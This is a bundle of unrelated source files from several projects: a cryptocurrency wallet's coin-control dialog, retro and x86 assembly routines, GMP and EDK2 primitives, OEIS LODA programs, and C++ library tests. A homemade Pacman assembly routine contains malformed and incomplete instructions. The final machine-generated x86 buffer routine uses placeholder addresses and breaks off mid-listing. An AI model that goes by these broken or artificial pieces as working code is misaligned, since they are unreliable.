ui->labelSmartFee->setText(BitcoinUnits::formatWithUnit(model->getOptionsModel()->getDisplayUnit(), CWallet::minTxFee.GetFeePerK()) + "/kB");
ui->labelSmartFee2->show(); // (Smart fee not initialized yet. This usually takes a few blocks...)
ui->labelFeeEstimation->setText("");
} else {
ui->labelSmartFee->setText(BitcoinUnits::formatWithUnit(model->getOptionsModel()->getDisplayUnit(), feeRate.GetFeePerK()) + "/kB");
ui->labelSmartFee2->hide();
ui->labelFeeEstimation->setText(tr("Estimated to begin confirmation within %n block(s).", "", nBlocksToConfirm));
}
updateFeeMinimizedLabel();
}
// UTXO splitter
void SendCoinsDialog::splitBlockChecked(int state)
{
if (model) {
CoinControlDialog::coinControl->fSplitBlock = (state == Qt::Checked);
fSplitBlock = (state == Qt::Checked);
ui->splitBlockLineEdit->setEnabled((state == Qt::Checked));
ui->labelBlockSizeText->setEnabled((state == Qt::Checked));
ui->labelBlockSize->setEnabled((state == Qt::Checked));
coinControlUpdateLabels();
}
}
//UTXO splitter
void SendCoinsDialog::splitBlockLineEditChanged(const QString& text)
{
//grab the amount in Coin Control AFter Fee field
QString qAfterFee = ui->labelCoinControlAfterFee->text().left(ui->labelCoinControlAfterFee->text().indexOf(" ")).replace("~", "").simplified().replace(" ", "");
//convert to CAmount
CAmount nAfterFee;
ParseMoney(qAfterFee.toStdString().c_str(), nAfterFee);
//if greater than 0 then divide after fee by the amount of blocks
CAmount nSize = nAfterFee;
int nBlocks = text.toInt();
if (nAfterFee && nBlocks)
nSize = nAfterFee / nBlocks;
//assign to split block dummy, which is used to recalculate the fee amount more outputs
CoinControlDialog::nSplitBlockDummy = nBlocks;
//update labels
ui->labelBlockSize->setText(QString::fromStdString(FormatMoney(nSize)));
coinControlUpdateLabels();
}
// Coin Control: copy label "Quantity" to clipboard
void SendCoinsDialog::coinControlClipboardQuantity()
{
GUIUtil::setClipboard(ui->labelCoinControlQuantity->text());
}
// Coin Control: copy label "Amount" to clipboard
void SendCoinsDialog::coinControlClipboardAmount()
{
GUIUtil::setClipboard(ui->labelCoinControlAmount->text().left(ui->labelCoinControlAmount->text().indexOf(" ")));
}
// Coin Control: copy label "Fee" to clipboard
void SendCoinsDialog::coinControlClipboardFee()
{
GUIUtil::setClipboard(ui->labelCoinControlFee->text().left(ui->labelCoinControlFee->text().indexOf(" ")).replace("~", ""));
}
// Coin Control: copy label "After fee" to clipboard
void SendCoinsDialog::coinControlClipboardAfterFee()
{
GUIUtil::setClipboard(ui->labelCoinControlAfterFee->text().left(ui->labelCoinControlAfterFee->text().indexOf(" ")).replace("~", ""));
}
// Coin Control: copy label "Bytes" to clipboard
void SendCoinsDialog::coinControlClipboardBytes()
{
GUIUtil::setClipboard(ui->labelCoinControlBytes->text().replace("~", ""));
}
// Coin Control: copy label "Priority" to clipboard
void SendCoinsDialog::coinControlClipboardPriority()
{
GUIUtil::setClipboard(ui->labelCoinControlPriority->text());
}
// Coin Control: copy label "Dust" to clipboard
void SendCoinsDialog::coinControlClipboardLowOutput()
{
GUIUtil::setClipboard(ui->labelCoinControlLowOutput->text());
}
// Coin Control: copy label "Change" to clipboard
void SendCoinsDialog::coinControlClipboardChange()
{
GUIUtil::setClipboard(ui->labelCoinControlChange->text().left(ui->labelCoinControlChange->text().indexOf(" ")).replace("~", ""));
}
// Coin Control: settings menu - coin control enabled/disabled by user
void SendCoinsDialog::coinControlFeatureChanged(bool checked)
{
ui->frameCoinControl->setVisible(checked);
if (!checked && model) // coin control features disabled
CoinControlDialog::coinControl->SetNull();
if (checked)
coinControlUpdateLabels();
}
// Coin Control: button inputs -> show actual coin control dialog
void SendCoinsDialog::coinControlButtonClicked()
{
CoinControlDialog dlg;
dlg.setModel(model);
dlg.exec();
coinControlUpdateLabels();
}
// Coin Control: checkbox custom change address
void SendCoinsDialog::coinControlChangeChecked(int state)
{
if (state == Qt::Unchecked) {
CoinControlDialog::coinControl->destChange = CNoDestination();
ui->labelCoinControlChangeLabel->clear();
} else
// use this to re-validate an already entered address
coinControlChangeEdited(ui->lineEditCoinControlChange->text());
ui->lineEditCoinControlChange->setEnabled((state == Qt::Checked));
}
// Coin Control: custom change address changed
void SendCoinsDialog::coinControlChangeEdited(const QString& text)
{
if (model && model->getAddressTableModel()) {
// Default to no change address until verified
CoinControlDialog::coinControl->destChange = CNoDestination();
ui->labelCoinControlChangeLabel->setStyleSheet("QLabel{color:red;}");
CBitcoinAddress addr = CBitcoinAddress(text.toStdString());
if (text.isEmpty()) // Nothing entered
{
ui->labelCoinControlChangeLabel->setText("");
} else if (!addr.IsValid()) // Invalid address
{
ui->labelCoinControlChangeLabel->setText(tr("Warning: Invalid SKWX address"));
} else // Valid address
{
CPubKey pubkey;
CKeyID keyid;
addr.GetKeyID(keyid);
if (!model->getPubKey(keyid, pubkey)) // Unknown change address
{
ui->labelCoinControlChangeLabel->setText(tr("Warning: Unknown change address"));
} else // Known change address
{
ui->labelCoinControlChangeLabel->setStyleSheet("QLabel{color:black;}");
// Query label
QString associatedLabel = model->getAddressTableModel()->labelForAddress(text);
if (!associatedLabel.isEmpty())
ui->labelCoinControlChangeLabel->setText(associatedLabel);
else
ui->labelCoinControlChangeLabel->setText(tr("(no label)"));
CoinControlDialog::coinControl->destChange = addr.Get();
}
}
}
}
// Coin Control: update labels
void SendCoinsDialog::coinControlUpdateLabels()
{
if (!model || !model->getOptionsModel() || !model->getOptionsModel()->getCoinControlFeatures())
return;
// set pay amounts
CoinControlDialog::payAmounts.clear();
for (int i = 0; i < ui->entries->count(); ++i) {
SendCoinsEntry* entry = qobject_cast<SendCoinsEntry*>(ui->entries->itemAt(i)->widget());
if (entry)
CoinControlDialog::payAmounts.append(entry->getValue().amount);
}
if (CoinControlDialog::coinControl->HasSelected()) {
// actual coin control calculation
CoinControlDialog::updateLabels(model, this);
// show coin control stats
ui->labelCoinControlAutomaticallySelected->hide();
ui->widgetCoinControl->show();
} else {
// hide coin control stats
ui->labelCoinControlAutomaticallySelected->show();
ui->widgetCoinControl->hide();
ui->labelCoinControlInsuffFunds->hide();
}
}
|
INCLUDE "graphics/grafix.inc"
SECTION code_clib
PUBLIC xorborder
PUBLIC _xorborder
EXTERN w_pixeladdress
; EXTERN l_cmp
;
; $Id: xorborder.asm,v 1.6 2016/10/13 06:32:03 stefano Exp $
;
; ***********************************************************************
;
; drawbox Timex hires version
;
.xorborder
._xorborder
push ix ;save callers
ld ix,2
add ix,sp
ld l,(ix+8)
ld h,(ix+9); x
ld a,1
cp h
jr c,xorborder_exit
ld e,(ix+6); y
ld a,maxy
cp e
jr c,xorborder_exit
; left vertical
call pixel_addr
call vertical
; right vertical line
ld l,(ix+8)
ld h,(ix+9); x
ld c,(ix+4)
ld b,(ix+5); width
add hl,bc
ld a,1
cp h
jr c,next
ld e,(ix+6)
call pixel_addr
call vertical
.next
; upper horizontal line
ld l,(ix+8)
ld h,(ix+9) ; x
ld e,(ix+6) ; y
call pixel_addr
call horizontal
; bottom horizontal line
ld l,(ix+8)
ld h,(ix+9) ; x
ld e,(ix+6) ; y
ld a,(ix+2);height
add e
ld e,a
pop af
call pixel_addr
.horizontal
ld c,(ix+4)
ld b,(ix+5) ; width
.loop3
ld a,(de)
xor (hl)
ld (de),a
call incx
jr c,xorborder_exit
ld a,b
or c
ret z
dec bc
jr loop3
.xorborder_exit
pop ix ;restore callers
ret
; (hl) mask
; de - screen address
.incx
rrc (hl)
ret nc
bit 5,d
jr nz,first
set 5,d
or a
ret
.first
res 5,d
inc e
ld a,e
and $1f
ret nz
scf
ret
.incy
inc d
ld a,d
and $07
ret nz
ld a,d
sub $08
ld d,a
ld a,e
add a,$20
ld e,a
ret nc
ld a,d
add a,$08
ld d,a
and 95
cp $58
ccf
ret
.pixel_addr
ld d,0
call w_pixeladdress
ld b,a
ld a,1
jr z,getout; pixel is at bit 0...
.loop1
rlca
djnz loop1
.getout
ld (PIXEL),a
ld hl,PIXEL
ret
.vertical
; vertical line
ld b,(ix+2) ; height
.loop2
ld a,(de)
xor (hl)
ld (de),a
call incy
ret c
djnz loop2
ret
SECTION bss_clib
.PIXEL
DEFB 0
|
; A061774: a(n) = (n-1)!, as n runs through the prime powers >= 1.
; Submitted by Christian Krause
; 1,1,2,6,24,720,5040,40320,3628800,479001600,1307674368000,20922789888000,6402373705728000,1124000727777607680000,620448401733239439360000,403291461126605635584000000,304888344611713860501504000000,265252859812191058636308480000000,8222838654177922817725562880000000
seq $0,181062 ; Prime powers minus 1.
seq $0,142 ; Factorial numbers: n! = 1*2*3*4*...*n (order of symmetric group S_n, number of permutations of n letters).
|
//
// Created by tao on 19-1-17.
//
#include "common_includes.h"
#include <iostream>
#include <libgo.h>
#include <stdio.h>
#include <thread>
void foo()
{
printf("function pointer\n");
}
struct A {
void fA() { printf("std::bind\n"); }
void fB() { printf("std::function\n"); }
};
int lib_go_main()
{
//----------------------------------
// 使用关键字go创建协程, go后面可以使用:
// 1.void(*)()函数指针, 比如:foo.
// 2.也可以使用无参数的lambda, std::bind对象, function对象,
// 3.以及一切可以无参调用的仿函数对象
// 注意不要忘记句尾的分号";".
go foo;
go []{
printf("lambda\n");
};
go std::bind(&A::fA, A());
std::function<void()> fn(std::bind(&A::fB, A()));
go fn;
// 也可以使用go_stack创建指定栈大小的协程
// 创建拥有10MB大栈的协程
go co_stack(10 * 1024 * 1024) []{
printf("large stack\n");
};
// 协程创建以后不会立即执行,而是暂存至可执行列表中,等待调度器调度。
// co_sched是默认的协程调度器,用户也可以使用自创建的协程调度器。
// 当仅使用一个线程进行协程调度时, 协程地执行会严格地遵循其创建顺序.
// 仅使用主线程调度协程.
// co_sched.Start();
// 以下代码可以使用等同于cpu核心数的线程调度协程.(包括主线程)
// co_sched.Start(0);
// 以下代码允许调度器自由扩展线程数,上限为1024.
// 当有线程被协程阻塞时, 调度器会启动一个新的线程, 以此保障
// 可用线程数总是等于Start的第一个参数(0表示cpu核心数).
// co_sched.Start(0, 1024);
// 如果不想让调度器卡住主线程, 可以使用以下方式:
std::thread t([]{ co_sched.Start(); });
t.detach();
co_sleep(100);
//----------------------------------
//----------------------------------
// 除了上述的使用默认的调度器外, 还可以自行创建额外的调度器,
// 协程只会在所属的调度器中被调度, 创建额外的调度器可以实现业务间的隔离.
// 创建一个调度器
co::Scheduler* sched = co::Scheduler::Create();
// 启动4个线程执行新创建的调度器
std::thread t2([sched]{ sched->Start(4); });
t2.detach();
// 在新创建的调度器上创建一个协程
go co_scheduler(sched) []{
printf("run in my scheduler.\n");
};
co_sleep(100);
return 0;
}
TEST(test_test, 1) {
EXPECT_EQ(1, 1);
}
int main(int argc, char **argv) {
int iRet = 0;
iRet = beforeRun();
if(iRet){
std::cerr<<"init fail with "<<iRet<<std::endl;
}
lib_go_main();
testing::InitGoogleTest(&argc,argv);
iRet = RUN_ALL_TESTS();
return iRet;
} |
// This is an open source non-commercial project. Dear PVS-Studio, please check it.
// PVS-Studio Static Code Analyzer for C, C++ and C#: http://www.viva64.com
#include "GameOverDialog.h"
#include "../Constants.h"
#include "../FontManager.h"
#include "NAS2D/Utility.h"
#include "NAS2D/Renderer/Renderer.h"
using namespace NAS2D;
GameOverDialog::GameOverDialog() : mHeader("ui/interface/game_over.png")
{
init();
}
GameOverDialog::~GameOverDialog()
{}
void GameOverDialog::init()
{
position(0, 0);
size(522, 340);
add(&btnClose, 5, 310);
btnClose.text("Return to Main Menu");
btnClose.size(512, 25);
btnClose.click().connect(this, &GameOverDialog::btnCloseClicked);
anchored(true);
}
void GameOverDialog::btnCloseClicked()
{
mCallback();
}
void GameOverDialog::update()
{
if (!visible()) { return; }
Window::update();
Renderer& r = Utility<Renderer>::get();
r.drawImage(mHeader, rect().x() + 5, rect().y() + 25);
// Yeah, I know. I hate it too but it made more sense than holding onto a static pointer.
r.drawText( *Utility<FontManager>::get().font(constants::FONT_PRIMARY, constants::FONT_PRIMARY_NORMAL),
"You have failed. Your colony is dead.", rect().x() + 5, rect().y() + 290, 255, 255, 255);
}
|
; the basic name defintions for soundfile et al v. 1.00 (c) 2012 W. Lenerz
section sound
include 'dev8_mac_proc'
xdef snd_nam
section procs
snd_nam lea procs,a1
move.w $110,a2
jmp (a2)
procs
proc_stt
proc_def SOUNDFILE
proc_def SOUNDFILE2
proc_def SOUNDFILE3
proc_def SETRATE10
proc_def SETRATE20
proc_def SOUNDSAMPLE2
proc_def SOUNDSAMPLE3
proc_def KILLSOUND
proc_def JVAVOL
proc_def JVA_VOL,jvavol
proc_end
proc_stt
proc_def SOUNDSAMPLE
proc_end
end
|
dnl AMD64 mpn_mul_2 optimised for Intel Sandy Bridge.
dnl Contributed to the GNU project by Torbjörn Granlund.
dnl Copyright 2003-2005, 2007, 2008, 2011-2013 Free Software Foundation, Inc.
dnl This file is part of the GNU MP Library.
dnl
dnl The GNU MP Library is free software; you can redistribute it and/or modify
dnl it under the terms of either:
dnl
dnl * the GNU Lesser General Public License as published by the Free
dnl Software Foundation; either version 3 of the License, or (at your
dnl option) any later version.
dnl
dnl or
dnl
dnl * the GNU General Public License as published by the Free Software
dnl Foundation; either version 2 of the License, or (at your option) any
dnl later version.
dnl
dnl or both in parallel, as here.
dnl
dnl The GNU MP Library is distributed in the hope that it will be useful, but
dnl WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
dnl or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
dnl for more details.
dnl
dnl You should have received copies of the GNU General Public License and the
dnl GNU Lesser General Public License along with the GNU MP Library. If not,
dnl see https://www.gnu.org/licenses/.
include(`../config.m4')
C cycles/limb best
C AMD K8,K9
C AMD K10
C AMD bull
C AMD pile
C AMD bobcat
C AMD jaguar
C Intel P4
C Intel core
C Intel NHM
C Intel SBR 2.57 2.52 using 4-way code
C Intel IBR 2.35 2.32 using 4-way code
C Intel HWL 2.02 1.86
C Intel BWL
C Intel atom
C VIA nano
C This code is the result of running a code generation and optimisation tool
C suite written by David Harvey and Torbjorn Granlund.
C When playing with pointers, set this to $2 to fall back to conservative
C indexing in wind-down code.
define(`I',`$1')
define(`rp', `%rdi') C rcx
define(`up', `%rsi') C rdx
define(`n_param', `%rdx') C r8
define(`vp', `%rcx') C r9
define(`n', `%rcx')
define(`v0', `%rbx')
define(`v1', `%rbp')
define(`w0', `%r8')
define(`w1', `%r9')
define(`w2', `%r10')
define(`w3', `%r11')
ABI_SUPPORT(DOS64)
ABI_SUPPORT(STD64)
ASM_START()
TEXT
ALIGN(32)
PROLOGUE(mpn_mul_2)
FUNC_ENTRY(4)
push %rbx
push %rbp
mov (vp), v0
mov 8(vp), v1
mov (up), %rax
lea (up,n_param,8), up
lea (rp,n_param,8), rp
test $1, R8(n_param)
jnz L(b1)
L(b0): mov $0, R32(n)
sub n_param, n
xor w0, w0
mul v0
mov %rax, w2
mov %rdx, w1
mov (up,n,8), %rax
jmp L(lo0)
L(b1): mov $1, R32(n)
sub n_param, n
xor w2, w2
mul v0
mov %rax, w0
mov %rdx, w3
mov -8(up,n,8), %rax
mul v1
jmp L(lo1)
ALIGN(32)
L(top): mul v0
add %rax, w0 C 1
mov %rdx, w3 C 2
adc $0, w3 C 2
mov -8(up,n,8), %rax
mul v1
add w1, w0 C 1
adc $0, w3 C 2
L(lo1): add %rax, w2 C 2
mov w0, -8(rp,n,8) C 1
mov %rdx, w0 C 3
adc $0, w0 C 3
mov (up,n,8), %rax
mul v0
add %rax, w2 C 2
mov %rdx, w1 C 3
adc $0, w1 C 3
add w3, w2 C 2
mov (up,n,8), %rax
adc $0, w1 C 1
L(lo0): mul v1
mov w2, (rp,n,8) C 2
add %rax, w0 C 3
mov %rdx, w2 C 4
mov 8(up,n,8), %rax
adc $0, w2 C 4
add $2, n
jnc L(top)
L(end): mul v0
add %rax, w0
mov %rdx, w3
adc $0, w3
mov I(-8(up),-8(up,n,8)), %rax
mul v1
add w1, w0
adc $0, w3
add %rax, w2
mov w0, I(-8(rp),-8(rp,n,8))
adc $0, %rdx
add w3, w2
mov w2, I((rp),(rp,n,8))
adc $0, %rdx
mov %rdx, %rax
pop %rbp
pop %rbx
FUNC_EXIT()
ret
EPILOGUE()
|
;------------------------------------------------------------------------------
;
; Copyright (c) 2006 - 2016, Intel Corporation. All rights reserved.<BR>
; SPDX-License-Identifier: BSD-2-Clause-Patent
;
; Module Name:
;
; InterlockedIncrement.Asm
;
; Abstract:
;
; InterlockedIncrement function
;
; Notes:
;
;------------------------------------------------------------------------------
SECTION .text
;------------------------------------------------------------------------------
; UINT32
; EFIAPI
; InternalSyncIncrement (
; IN volatile UINT32 *Value
; );
;------------------------------------------------------------------------------
global ASM_PFX(InternalSyncIncrement)
ASM_PFX(InternalSyncIncrement):
mov ecx, [esp + 4]
mov eax, 1
lock xadd dword [ecx], eax
inc eax
ret
|
segment .data
fmt_out: dq "The sum is: %lld", 10, 0
fmt: dq "%s", 10, 0
fmt_in: dq "%lld", 0
a: dq 0
b: dq 0
segment .text
global main
extern printf
extern scanf
print_function:
push RBP
mov RBP, RSP
mov RAX, [RBP + 16]
mov RBX, [RBP + 24]
add RAX, RBX
mov [a], RAX
mov RAX, 0
mov RBX, 0
mov RDI, fmt_out
mov RSI, [a]
call printf
pop RBP
ret
main:
push RBP
mov RBP, RSP
mov RAX, 0
mov RBX, 0
mov RCX, 0
mov RDI, fmt_in
mov RSI, a
call scanf
mov RAX, 0
mov RBX, 0
mov RCX, 0
mov RDI, fmt_in
mov RSI, b
call scanf
mov RAX, [a]
push RAX
mov RAX, [b]
push RAX
call print_function
pop RAX
pop RAX
mov RAX, 0
pop RBP
ret
|
#include <vector>
#include <opengm/functions/explicit_function.hxx>
#include <opengm/unittests/test.hxx>
#include <opengm/graphicalmodel/graphicalmodel.hxx>
#include <opengm/operations/adder.hxx>
#include <opengm/operations/minimizer.hxx>
#include <opengm/inference/icm.hxx>
#include <opengm/utilities/metaprogramming.hxx>
#include <opengm/functions/learnable/lpotts.hxx>
//#include <opengm/learning/maximum-likelihood-learning.hxx>
#include <opengm/learning/maximum_likelihood_learning.hxx>
#include <opengm/learning/loss/hammingloss.hxx>
#include <opengm/learning/dataset/testdatasets.hxx>
//*************************************
typedef double ValueType;
typedef size_t IndexType;
typedef size_t LabelType;
typedef opengm::meta::TypeListGenerator<
opengm::ExplicitFunction<ValueType,IndexType,LabelType>,
opengm::functions::learnable::LPotts<ValueType,IndexType,LabelType>,
opengm::functions::learnable::LWeightedSumOfFunctions<ValueType,IndexType,LabelType>
>::type FunctionListType;
typedef opengm::GraphicalModel<
ValueType,opengm::Adder,
FunctionListType,
opengm::DiscreteSpace<IndexType,LabelType>
> GM;
typedef opengm::learning::HammingLoss LOSS;
typedef opengm::datasets::TestDataset0<GM,LOSS> DS0;
typedef opengm::datasets::TestDataset1<GM,LOSS> DS1;
typedef opengm::datasets::TestDataset2<GM,LOSS> DS2;
typedef opengm::datasets::TestDatasetSimple<GM,LOSS> DSSimple;
typedef opengm::ICM<GM,opengm::Minimizer> INF;
typedef typename opengm::BeliefPropagationUpdateRules<GM, opengm::Integrator> UpdateRules;
typedef typename opengm::MessagePassing<GM, opengm::Integrator, UpdateRules, opengm::MaxDistance> BeliefPropagation;
//*************************************
int main() {
std::cout << " Includes are fine :-) " << std::endl;
/*
{
DS0 dataset;
std::cout << "Dataset includes " << dataset.getNumberOfModels() << " instances and has " << dataset.getNumberOfWeights() << " parameters."<<std::endl;
opengm::learning::MaximumLikelihoodLearner<DS0,LOSS>::Weight weight;
opengm::learning::MaximumLikelihoodLearner<DS0,LOSS> learner(dataset,weight);
INF::Parameter infWeight;
learner.learn<INF>(infWeight);
}
*/
{
DS1 dataset;
std::cout << "Dataset includes " << dataset.getNumberOfModels() << " instances and has " << dataset.getNumberOfWeights() << " parameters."<<std::endl;
opengm::learning::MaximumLikelihoodLearner<DS1>::Parameter parameter;
parameter.maximumNumberOfIterations_ = 15;
parameter.gradientStepSize_ = 0.1;
parameter.weightStoppingCriteria_ = 0.001;
parameter.gradientStoppingCriteria_ = 0.00000000001;
parameter.infoFlag_ = true;
parameter.infoEveryStep_ = true;
parameter.weightRegularizer_ = 1.0;
parameter.beliefPropagationMaximumNumberOfIterations_ = 5;
parameter.beliefPropagationConvergenceBound_ = 0.0001;
parameter.beliefPropagationDamping_ = 0.5;
parameter.beliefPropagationTemperature_ = 0.3;
parameter.beliefPropagationIsAcyclic_ = opengm::Tribool(opengm::Tribool::Maybe);
opengm::learning::MaximumLikelihoodLearner<DS1> learner(dataset,parameter);
learner.learn();
}
{
DS2 dataset;
std::cout << "Dataset includes " << dataset.getNumberOfModels() << " instances and has " << dataset.getNumberOfWeights() << " parameters."<<std::endl;
opengm::learning::MaximumLikelihoodLearner<DS2>::Parameter parameter;
parameter.maximumNumberOfIterations_ = 15;
parameter.gradientStepSize_ = 0.1;
parameter.weightStoppingCriteria_ = 0.001;
parameter.gradientStoppingCriteria_ = 0.00000000001;
parameter.infoFlag_ = true;
parameter.infoEveryStep_ = true;
parameter.weightRegularizer_ = 1.0;
parameter.beliefPropagationMaximumNumberOfIterations_ = 5;
parameter.beliefPropagationConvergenceBound_ = 0.0001;
parameter.beliefPropagationDamping_ = 0.5;
parameter.beliefPropagationTemperature_ = 0.3;
parameter.beliefPropagationIsAcyclic_ = opengm::Tribool(opengm::Tribool::Maybe);
opengm::learning::MaximumLikelihoodLearner<DS2> learner(dataset,parameter);
learner.learn();
}
/*
{
DS2 dataset;
std::cout << "Dataset includes " << dataset.getNumberOfModels() << " instances and has " << dataset.getNumberOfWeights() << " parameters."<<std::endl;
opengm::learning::MaximumLikelihoodLearner<DS2,LOSS>::Weight weight;
opengm::learning::MaximumLikelihoodLearner<DS2,LOSS> learner(dataset,weight);
INF::Parameter infWeight;
learner.learn<INF>(infWeight);
}
/*
{
DSSimple dataset;
std::cout << "Dataset includes " << dataset.getNumberOfModels() << " instances and has " << dataset.getNumberOfWeights() << " parameters."<<std::endl;
opengm::learning::MaximumLikelihoodLearner<DSSimple,LOSS>::Weight weight;
opengm::learning::MaximumLikelihoodLearner<DSSimple,LOSS> learner(dataset,weight);
INF::Parameter infWeight;
learner.learn<INF>(infWeight);
}
*/
}
|
; A135172: a(n) = 3^prime(n) + 2^prime(n).
; 13,35,275,2315,179195,1602515,129271235,1162785755,94151567435,68630914235795,617675543767595,450284043329950835,36472998576194041955,328256976190630099835,26588814499694991643115,19383245676687219151537715,14130386092315195257068234555,127173474827954453552096993555,92709463148045411038351601823515,7509466514982085987188150780864395,67585198634826967968486182914745315
seq $0,40 ; The prime numbers.
mov $1,3
pow $1,$0
mov $2,2
pow $2,$0
add $1,$2
mov $0,$1
|
//pacman's draw glyph
//
// if opentimer == 1
// load open timer
// open timer in 65511
//storing r1 in
LUI 255 r1
ORI 231 r1
LOAD r1 r1
//check to see if is 1
CMPI 1 r1
//check condition code
BNE AFTER_MOUTH_TOGGLE
//if timer is 1, invert the mouth condition
//get the value of the mouth condition
//r2 has the mouth condition address
LUI 51 r2
ORI 146 r2
LOAD r3 r2
MULTI -1 r3
//store back in memory
STOR r3 r2
AFTER_MOUTH_TOGGLE:
//APPARENTLY R3 IS USED LATER
//I'M MOVING THE MOUTH POSITION TO R4...
MOV R3 R4
//MAKE PACMAN LOCATION ADDRESS IN r2
LUI 51 r2
ORI 144 r2
//MAKE PACMAN STATE ADDRESS IN r3
LUI 51 r3
ORI 145 r3
//load location of pacman INTO r0
LOAD r0 r2
//CHECK IF STATE UP0
drawUP0:
LOAD r0 r3
CMPI 16 r0
BNE drawUP1 //else check if in state UP1
//check the condition of the mouth
//if open
COMPI 1 R4
BNE CLOSED_STATE_UP0
LUI 1 r1 //load PACMAN_OPEN_UP_0
ORI 8 r1
STOR r1 r0
ADDI -53 r0 //get location below pacman
MOVI 0 r1 //LOAD BLANK
STOR r1 r0
RETX
CLOSED_STATE_UP0:
LUI 0 r1 //load PACMAN_CLOSED_UP_0
ORI 179 r1
STOR r1 r0
ADDI -53 r0 //get location below pacman
MOVI 0 r1 //LOAD BLANK
STOR r1 r0
RETX
//CHECK IF STATE UP1
drawUP1:
LOAD r0 r3
CMPI 17 r0
BNE drawUP2 //else check if in state UP2
//CHECK CONDITION OF MOUTH
//IF OPEN
COMPI 1 R4
BNE CLOSED_STATE_UP1
LOAD R0 R
LOAD r0 r2 //get PACMAN_OPEN_UP1
LUI 1 r1
ORI 9 r1
STOR r1 r0 //store to fb at pacman location
ADDI 53 r0 //get location above pacman
ADDI 1 r1 //get PACMAN_OPEN_UP2
STOR r1 r0 //store at location above pacman
CLOSED_STATE_UP1:
RETX
//STATE UP2
drawUP2:
LOAD r0 r3
CMPI 18 r0
BNE drawUP3 //else check if in state UP3
LOAD r0 r2
LUI 1 r1 //get PACMAN_OPEN_UP3
ORI 11 r1 //store to pacman location
STOR r1 r0 //get location above pacman
ADDI 53 r0
ADDI 1 r1 //get PACMAN_OPEN_UP3
STOR r1 r0 //store to location above pacman
RETX
//STATE UP3
drawUP3:
LOAD r0 r3
CMPI 19 r0
BNE drawDOWN0 //else check if in state DOWN0
LOAD r0 r2
LUI 1 r1
ORI 14 r1
STOR
RETX
//STATE DOWN0
drawDOWN0:
LOAD r0 r3
CMPI 32 r0
BNE drawDOWN1 //else check if in state DOWN1
LOAD r0 r2
RETX
//STATE DOWN1
drawDOWN1:
LOAD r0 r3
CMPI 33 r0
BNE drawDOWN2
LOAD r0 r2
RETX
//STATE DOWN2
drawDOWN2:
LOAD r0 r3
CMPI 34 r0
BNE drawDOWN3
LOAD r0 r2
RETX
//STATE DOWN3
drawDOWN3:
LOAD r0 r3
CMPI 35 r0
BNE drawLEFT0
LOAD r0 r2
RETX
//STATE LEFT0
drawLEFT0:
LOAD r0 r3
CMPI 48 r0
BNE drawLEFT1
LOAD r0 r2
RETX
//STATE LEFT1
drawLEFT1:
LOAD r0 r3
CMPI 49 r0
BNE drawLEFT2
LOAD r0 r2
RETX
//STATE LEFT2
drawLEFT2:
LOAD r0 r3
CMPI 50 r0
BNE drawLEFT3
LOAD r0 r2
RETX
//STATE LEFT3
drawLEFT3:
LOAD r0 r3
CMPI 51 r0
BNE drawRIGHT0
LOAD r0 r2
RETX
//STATE RIGHT0
drawRIGHT0:
LOAD r0 r3
CMPI 64 r0
BNE drawRIGHT1
LOAD r0 r2
RETX
//STATE RIGHT1
drawRIGHT1:
LOAD r0 r3
CMPI 65 r0
BNE drawRIGHT2
LOAD r0 r2
RETX
//STATE RIGHT2
drawRIGHT2:
LOAD r0 r3
CMPI 66 r0
BNE drawRIGHT3
LOAD r0 r2
RETX
//STATE RIGHT3
drawRIGHT3:
LOAD r0 r3
CMPI 67 r0
BNE drawDEAD1
LOAD r0 r2
RETX
//STATE DEAD1
drawDEAD1:
LOAD r0 r3
CMPI 1 r0
BNE drawDEAD2
LOAD r0 r2
RETX
//STATE DEAD2
drawDEAD2:
LOAD r0 r3
CMPI 2 r0
BNE drawDEAD3
LOAD r0 r2
RETX
//STATE DEAD3
drawDEAD3:
LOAD r0 r3
CMPI 3 r0
BNE drawDEAD4
LOAD r0 r2
RETX
//STATE DEAD4.. if not any state above, draw as dead4
drawDEAD4:
LOAD r0 r2
RETX |
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r8
push %r9
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0x1ee98, %rsi
lea addresses_normal_ht+0xcd9c, %rdi
nop
inc %r12
mov $27, %rcx
rep movsl
sub %r9, %r9
lea addresses_UC_ht+0xeb69, %rsi
lea addresses_D_ht+0xd929, %rdi
add $41236, %r8
mov $119, %rcx
rep movsl
nop
add $869, %r9
lea addresses_D_ht+0x8e9, %rdi
nop
nop
and %r9, %r9
mov $0x6162636465666768, %rcx
movq %rcx, %xmm5
movups %xmm5, (%rdi)
sub $27848, %rsi
lea addresses_normal_ht+0x8da9, %rsi
lea addresses_WC_ht+0x17da6, %rdi
nop
nop
nop
nop
nop
add %r8, %r8
mov $84, %rcx
rep movsq
nop
nop
nop
nop
nop
add %r12, %r12
lea addresses_normal_ht+0x103a1, %r9
cmp $15010, %r8
mov $0x6162636465666768, %rdi
movq %rdi, %xmm2
and $0xffffffffffffffc0, %r9
movaps %xmm2, (%r9)
nop
nop
add %r8, %r8
lea addresses_D_ht+0x4a5, %rdi
nop
nop
nop
nop
sub %rbx, %rbx
movl $0x61626364, (%rdi)
nop
nop
nop
cmp %rbx, %rbx
lea addresses_UC_ht+0x9f29, %rsi
lea addresses_UC_ht+0xeb29, %rdi
nop
nop
inc %r10
mov $114, %rcx
rep movsl
nop
nop
nop
nop
nop
and $19968, %rcx
lea addresses_D_ht+0x80a9, %rsi
lea addresses_A_ht+0x8c71, %rdi
nop
nop
sub %r9, %r9
mov $80, %rcx
rep movsl
nop
nop
nop
nop
inc %r9
lea addresses_D_ht+0x16929, %rsi
lea addresses_D_ht+0x1ee29, %rdi
nop
nop
nop
nop
add $59533, %r12
mov $44, %rcx
rep movsq
nop
add $27224, %rsi
lea addresses_WT_ht+0x138b3, %r12
nop
nop
nop
nop
add $54057, %r8
movups (%r12), %xmm0
vpextrq $1, %xmm0, %rsi
xor %r10, %r10
lea addresses_WT_ht+0x1b729, %rsi
lea addresses_A_ht+0x2b29, %rdi
and $18846, %r8
mov $99, %rcx
rep movsl
nop
nop
nop
nop
nop
dec %r10
lea addresses_WC_ht+0x13d29, %rsi
lea addresses_WC_ht+0x17cc9, %rdi
nop
nop
nop
nop
inc %r9
mov $116, %rcx
rep movsl
nop
nop
nop
sub %r10, %r10
lea addresses_D_ht+0x4329, %rsi
lea addresses_A_ht+0x1c9e9, %rdi
nop
nop
nop
xor %r10, %r10
mov $106, %rcx
rep movsq
nop
and $33394, %rbx
